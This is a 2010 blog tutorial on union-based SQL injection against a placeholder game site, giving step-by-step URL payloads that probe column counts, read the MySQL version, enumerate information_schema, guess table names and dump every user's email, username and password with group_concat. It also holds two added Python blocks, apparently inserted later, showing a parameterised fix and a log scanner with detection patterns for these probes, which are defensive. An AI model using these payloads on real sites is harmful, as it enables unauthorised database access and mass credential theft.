Thursday, 25 November 2010

Regular SQL Injection

First thing you need to know is that SQL can be tricky sometimes. Even if something looks vulnerable, it isn't always, and that works the other way around too.

There are a few different types of SQLi: Regular SQLi, Blind SQLi, Advanced SQLi, In-depth SQLi, Extensive SQLi, and Deep SQLi.

Now, what ways can we use an SQLi?
Well, there are URLs and input boxes/forms. Those are the two most common. But it's also possible via XSS, RFI, LFI, and so on.

What can we gain from a successful SQLi?
Database access, which is pretty much everything on the web server.

This can be both useful and dangerous. If you were a web admin and forgot your login credentials, you could use an SQLi exploit that you had hidden for just this, but I wouldn't recommend it. If a hacker were to locate it, he could use the same thing to get your password, and every password in the database.

But how does it work?
Well, I'll explain it like this.
Let's pretend the DB (database) is a cookie monster, and you're the person who wants some information out of the cookie monster. But the cookie monster only gives this info to people who give him "god cookies". Alas, you don't know how to make those cookies. So you try giving him a vanilla cookie. Well, the cookie monster is allergic to vanilla, so he says **** you. Now what? Well, you can SQLi him. How? You take your vanilla cookie and add some magic sprinkles to make it a "god cookie". Once the cookie monster eats this cookie, he is under our control, and we can get whatever info we want.

Now, say we want to get access to an admin page, what would we do?
Well, the first thing we would do is check if it has any sort of input validation. To do this, we could test the inputs and hope it's vulnerable, or we could take a look at the source. Sometimes when we look at the source we see that the web dev was sloppy, which works perfectly for us.

So, let's say we want to exploit this via the URL. How would we do this?
Well, we would look for a page that calls another page for info, like a game website.

Code:
http://gamewebsite.com/game.php?game=184

We see that and think: this could be exploitable. So we just add a ' to the end. Let's assume we get an SQL error, or there is data missing from the page. Perfect, we know it's vulnerable. But now what do we do? We use the ORDER BY clause to see how many columns are returned. To do this, we take the original URL and do this:
Code:
http://gamewebsite.com/game.php?game=184+ORDER+BY+10--
Another way to see if a website is vulnerable to regular SQLi without the ' at the end is to add +ORDER+BY+99999999999999999999999999-- to the end of the URL. If an error shows, it's vulnerable. If not, chances are they are filtering input, and it's not vulnerable to regular SQLi.

That would do one of two things.
1) The page would load normally.
2) We would get an error.

If we get an error, we know there are fewer than that many columns. If it loads normally, we keep going higher until we find an error. So if the lowest number that gives an error is 4, then we know there are 3 columns, and column 4 doesn't exist (which is why we got the error).


Now, on to finding the vulnerable column. Get rid of the +ORDER+BY in the URL and replace it with +UNION+SELECT.

Code:
http://gamewebsite.com/game.php?game=184+UNION+SELECT+1,2,3--
(There are 3 columns).

Once we send that, it should display a number on the page (it will be 1, 2, or 3). If no number is displayed, that's okay. Some websites require you to null the value you are injecting into. So the new URL would be:

Code:
http://gamewebsite.com/game.php?game=-184+UNION+SELECT+1,2,3--
All we did was add the - before 184.

So, let's assume the page displayed a 2. That would mean the second column is vulnerable.
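To see why the ORDER BY and UNION SELECT probes above behave the way they do, here is an added example (it is not code from the original post) that builds a tiny game lookup in SQLite, once with the query-string value pasted into the SQL the way a vulnerable game.php would do it, and once with the id validated and bound as a parameter. The schema, table rows and function names are constructed for this example, and SQLite stands in for MySQL, so the exact error text differs, but the column-count error and the UNION behaviour are the same.

```python
import sqlite3

# Constructed sample schema standing in for the game lookup behind game.php?game=184.
# (SQLite is used here instead of MySQL; the UNION / ORDER BY behaviour is the same.)
SCHEMA = """
CREATE TABLE games (id INTEGER PRIMARY KEY, title TEXT, genre TEXT);
INSERT INTO games VALUES (184, 'Space Blaster', 'arcade');
INSERT INTO games VALUES (185, 'Kart Rush', 'racing');
"""


def open_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def lookup_vulnerable(conn, game):
    # The defect: the decoded query-string value is pasted straight into the SQL text,
    # so "184 ORDER BY 4--" or "-184 UNION SELECT 1,2,3--" becomes part of the statement.
    sql = "SELECT id, title, genre FROM games WHERE id = " + game
    return conn.execute(sql).fetchall()


def lookup_safe(conn, game):
    # Hardened form: insist the value has the shape the page expects (an integer id),
    # then bind it as a parameter so it can never be parsed as SQL.
    try:
        game_id = int(game)
    except ValueError:
        return []  # reject anything that is not a plain integer
    sql = "SELECT id, title, genre FROM games WHERE id = ?"
    return conn.execute(sql, (game_id,)).fetchall()


def probe(conn, lookup, game):
    """Run one lookup and report ("rows", rows) or ("error", message),
    which is exactly the signal the ORDER BY / UNION probes rely on."""
    try:
        return ("rows", lookup(conn, game))
    except sqlite3.Error as exc:
        return ("error", str(exc))


if __name__ == "__main__":
    db = open_db()
    # The values below are the tutorial's URL parameters after URL-decoding ("+" -> space).
    for value in ["184", "184 ORDER BY 3--", "184 ORDER BY 4--", "-184 UNION SELECT 1,2,3--"]:
        print(f"{value!r:32} vulnerable: {probe(db, lookup_vulnerable, value)}")
        print(f"{value!r:32} safe:       {probe(db, lookup_safe, value)}")
```

With the vulnerable lookup, ORDER BY 3 loads normally and ORDER BY 4 raises an error (three columns), and the negated id plus UNION SELECT 1,2,3 returns the marker row instead of a game. The parameterised lookup returns nothing for all three probes, because the value never reaches the SQL parser.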

Now, we need to find the SQL version. How do we do this?
It's quite simple actually. We just use @@version. This should return either version 4.x or 5.x. To inject @@version, we replace the vulnerable column with it.


Code:
http://gamewebsite.com/game.php?game=-184+UNION+SELECT+1,@@version,3--
If the page loads completely normally, it's alright. Sometimes we need to convert the function so the SQL server understands the command. This is usually the only thing that needs to be converted, and even then it's rare. So, if we didn't get the version number from the above command, we would change it to:


Code:
http://gamewebsite.com/game.php?game=-184+UNION+SELECT+1,convert(@@version using latin1),3--
And if even that doesn't return the version, then we will also need to hex it.

Code:
http://gamewebsite.com/game.php?game=-184+UNION+SELECT+1,unhex(hex(@@version)),3--
That should show us the SQL version. It will be either version 4 or 5 something, like I said before.

Now, version 4 is more of a pain in the ass, or so most people think. Most guides don't show people how to get the table names from a version 4 SQL DB. But we will. The URL will be a lot longer in this case.


Code:
http://gamewebsite.com/game.php?game=-184+UNION+SELECT+1,concat(table_name,CHAR(58),column_name,CHAR(58),table_schema) from information_schema.columns where column_name like CHAR(37, 112, 97, 115, 37),3--
That should show the table names. But if it doesn't, you are going to have to start guessing, which is why it's a pain in the ass.

How do we do this? Well, we take our original URL and add: from *table name*

Common table names are: 

Code:
tbl_user, tbl_admin, tbl_access, user, users, member, members, admin, admins, customer, customers, orders, phpbb_users, phpbb_admins
Code:
http://gamewebsite.com/game.php?game=-184+UNION+SELECT+1,2,3 from admin
We get an error, which means it doesn't exist.


Code:
http://gamewebsite.com/game.php?game=-184+UNION+SELECT+1,2,3 from user
We get another error.


Code:
http://gamewebsite.com/game.php?game=-184+UNION+SELECT+1,2,3 from admins
Still an error.


Code:
http://gamewebsite.com/game.php?game=-184+UNION+SELECT+1,2,3 from users
No error. So we know the table users exists.

Now, we need to guess column names in the table we just found. Column names within this table would most likely be something like:
first_name, last_name, email, username, password, pass, user_id
You have to use common sense in a lot of this. Now we go back a few steps and remember which column was vulnerable (2). So we replace the 2 with the column name we hope exists in the users table.


Code:
http://gamewebsite.com/game.php?game=-184+UNION+SELECT+1,first_name,3 from users
Error


Code:
http://gamewebsite.com/game.php?game=-184+UNION+SELECT+1,last_name,3 from users
Error


Code:
http://gamewebsite.com/game.php?game=-184+UNION+SELECT+1,address,3 from users
Error


Code:
http://gamewebsite.com/game.php?game=-184+UNION+SELECT+1,username,3 from users
No error, so we know username exists. Now we want to see if the password column exists too, for obvious reasons.


Code:
http://gamewebsite.com/game.php?game=-184+UNION+SELECT+1,password,3 from users
No error. That's good. Now let's see if we can get the email address too.


Code:
http://gamewebsite.com/game.php?game=-184+UNION+SELECT+1,email,3 from users
Error.. Well ****..


Code:
http://gamewebsite.com/game.php?game=-184+UNION+SELECT+1,email_address,3 from users
No error, perfect. 


So we can see that in the table users, we can extract the email, username, and password.
Doing it like this will display the first row of information, which is normally the admin login. If we only wanted the admin's login info, we would use the concat() function. To do so, we would do something like:



Code:
http://gamewebsite.com/game.php?game=-184+UNION+SELECT+1,concat(email,0x3a,username,0x3a,password),3 from users
The 0x3a is there because it's the hex value of a semi-colon.

That would show the email, username, then password of the first user in the DB.

But of course we want more than the admin's info. We want everyone's. How else would we make a good login dump? To get all the info from the columns we want, we use the group_concat() function.


Code:
http://gamewebsite.com/game.php?game=-184+UNION+SELECT+1,group_concat(email,0x3a,username,0x3a,password),3 from users
That would display all the emails, then usernames, then passwords of everyone in the users table.

Okay, now, if instead of version 4 we got version 5, we would be very happy, because 5 is the easiest one to hack.

So we want to get the table names. This time though, we don't have to guess. The URL would look something like this:


Code:
http://gamewebsite.com/game.php?game=-184+UNION+SELECT+1,table_name,3 from information_schema.tables
That would display the first table name. Again, we want more. So what do we do? We use group_concat().


Code:
http://gamewebsite.com/game.php?game=-184+UNION+SELECT+1,group_concat(table_name),3 from information_schema.tables
Sometimes some of the table names will be cut off, because we are calling the tables from information_schema. So here we would want to pull the data from the primary database instead of information_schema.

An example of this is:


Code:
http://gamewebsite.com/game.php?game=-184+UNION+SELECT+1,group_concat(table_name),3 from information_schema.tables+where+table_schema=database()
All the tables from the primary DB should be displayed there. Some of them could be:


Code:
About, Admin, Admins, User, Users, Affiliates, Access, Customer, etc
Now we want to extract the data from those tables. Let's assume there was just the users table. We change the data in the vulnerable column from table_name to column_name.


Code:
http://gamewebsite.com/game.php?game=-184+UNION+SELECT+1,group_concat(column_name),3 from information_schema.columns+where+table_name=*Hexed table name*
So, if we were to try:

Code:
http://gamewebsite.com/game.php?game=-184+UNION+SELECT+1,group_concat(column_name),3 from information_schema.columns+where+table_name=Users
We would get an error, because we didn't hex the table_name at the end. So I hex my table name: Users: 5573657273. I used Convert String To Hexadecimal Online, but there are many others.


Code:
http://gamewebsite.com/game.php?game=-184+UNION+SELECT+1,group_concat(column_name),3 from information_schema.columns+where+table_name=5573657273
That would again give us an error, because we have to add the MySQL integer prefix (0x) right before the hex.


Code:
http://gamewebsite.com/game.php?game=-184+UNION+SELECT+1,group_concat(column_name),3 from information_schema.columns+where+table_name=0x5573657273
Then that would display all the columns under the table name Users.

In this example, we will assume that first_name, last_name, email, username, and password are displayed. So we go back to the version 4 part of the tutorial, and the URL is formed the same as the final command there.


Code:
http://gamewebsite.com/game.php?game=-184+UNION+SELECT+1,group_concat(email,0x3a,username,0x3a,password),3 from Users
That's about it for regular SQLi.
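From the defender's side, the whole walkthrough above leaves a very recognisable trail in a web server's access log: a trailing quote, ORDER BY with a huge number, UNION SELECT, @@version, information_schema queries and 0x hex literals, all from one client within a couple of minutes. The following added example (it is not code from the original post) scans access-log lines for exactly those indicators and flags clients that trip several of them. The log lines, IP addresses and the threshold are constructed for the example; a real deployment would read the server's own log file.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed sample access-log lines (Apache combined format). The hosts, IPs and
# requests are made up; the requests mirror the probe sequence in the tutorial.
SAMPLE_LOG = """\
203.0.113.5 - - [25/Nov/2010:10:00:01 +0000] "GET /game.php?game=184 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.5 - - [25/Nov/2010:10:00:09 +0000] "GET /game.php?game=184' HTTP/1.1" 500 312 "-" "Mozilla/5.0"
203.0.113.5 - - [25/Nov/2010:10:00:15 +0000] "GET /game.php?game=184+ORDER+BY+99999999999999999999-- HTTP/1.1" 500 312 "-" "Mozilla/5.0"
203.0.113.5 - - [25/Nov/2010:10:00:41 +0000] "GET /game.php?game=-184+UNION+SELECT+1,@@version,3-- HTTP/1.1" 200 4870 "-" "Mozilla/5.0"
203.0.113.5 - - [25/Nov/2010:10:01:02 +0000] "GET /game.php?game=-184+UNION+SELECT+1,group_concat(table_name),3+from+information_schema.tables+where+table_schema=database()-- HTTP/1.1" 200 6010 "-" "Mozilla/5.0"
203.0.113.5 - - [25/Nov/2010:10:01:30 +0000] "GET /game.php?game=-184+UNION+SELECT+1,group_concat(column_name),3+from+information_schema.columns+where+table_name=0x5573657273-- HTTP/1.1" 200 6210 "-" "Mozilla/5.0"
198.51.100.7 - - [25/Nov/2010:10:02:00 +0000] "GET /game.php?game=185 HTTP/1.1" 200 5080 "-" "Mozilla/5.0"
"""

# Enough of the combined log format to pull out client IP, request target and status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Each indicator is matched against the URL-decoded value of every query parameter.
INDICATORS = {
    "quote_probe": re.compile(r"'\s*$"),
    "order_by_probe": re.compile(r"\border\s+by\s+\d+", re.I),
    "union_select": re.compile(r"\bunion\s+(all\s+)?select\b", re.I),
    "version_probe": re.compile(r"@@version|\bversion\(\)", re.I),
    "schema_enum": re.compile(r"\binformation_schema\.", re.I),
    "hex_literal": re.compile(r"\b0x[0-9a-f]+\b", re.I),
    "concat_dump": re.compile(r"\bgroup_concat\s*\(", re.I),
}


def decode_params(target):
    """Split the request target and decode each query value ('+' becomes a space, %xx is decoded),
    so the patterns see what the application's SQL layer would have seen."""
    return parse_qsl(urlsplit(target).query, keep_blank_values=True)


def scan_line(line):
    """Return an alert dict for one log line, or None when no indicator matches."""
    m = LOG_RE.match(line)
    if not m:
        return None
    hits = set()
    for _name, value in decode_params(m.group("target")):
        for indicator, pattern in INDICATORS.items():
            if pattern.search(value):
                hits.add(indicator)
    if not hits:
        return None
    return {"ip": m.group("ip"), "status": m.group("status"), "indicators": sorted(hits)}


def scan_log(text):
    """Scan every line of a log and collect alerts with their 1-based line numbers."""
    alerts = []
    for number, line in enumerate(text.splitlines(), start=1):
        alert = scan_line(line)
        if alert:
            alert["line"] = number
            alerts.append(alert)
    return alerts


def suspicious_ips(alerts, threshold=3):
    """Clients with at least `threshold` alerts: a single odd request can be a typo,
    but the column-count, version and schema probes in sequence are enumeration."""
    counts = {}
    for alert in alerts:
        counts[alert["ip"]] = counts.get(alert["ip"], 0) + 1
    return {ip: n for ip, n in counts.items() if n >= threshold}


if __name__ == "__main__":
    found = scan_log(SAMPLE_LOG)
    for alert in found:
        print(f"line {alert['line']}: {alert['ip']} status={alert['status']} {alert['indicators']}")
    print("suspicious clients:", suspicious_ips(found))
```

On the constructed log, lines 2 to 6 each raise an alert and 203.0.113.5 is reported with five hits, while the ordinary requests for game 184 and 185 stay silent. The decoding step matters: matching the raw request line would miss `+ORDER+BY+` written with plus signs or with %20, so the patterns are applied after the same decoding the application performs.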


Hope you like all these articles on website hacking. Leave your comments.